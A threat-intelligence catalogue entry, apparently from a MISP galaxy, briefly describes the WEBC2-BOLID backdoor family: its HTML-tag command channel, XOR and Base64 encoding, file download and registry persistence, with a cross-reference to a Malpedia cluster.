Skip to content

Hide Navigation Hide TOC

WEBC2-BOLID (a601e1b0-c0bc-4665-9639-4dc5e588520c)

A WEBC2 backdoor is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. This family of malware is a backdoor capable of downloading files and updating its configuration. Communication with the command and control (C2) server uses a combination of single-byte XOR and Base64 encoded data wrapped in standard HTML tags. The malware family installs a registry key as a persistence mechanism.

Cluster A Galaxy A Cluster B Galaxy B Level
WEBC2-BOLID (a601e1b0-c0bc-4665-9639-4dc5e588520c) Tool WebC2-Bolid (71292a08-9a7b-4df1-b1fd-7d80a8fcc18f) Malpedia 1